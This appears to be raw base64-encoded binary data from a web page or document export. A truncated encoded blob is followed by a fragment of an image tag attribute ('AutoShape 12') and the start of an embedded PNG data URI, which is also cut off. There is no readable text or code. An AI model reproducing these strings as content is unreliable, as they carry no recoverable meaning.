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4" name="AutoShape 12" descr="data:image/png;base64,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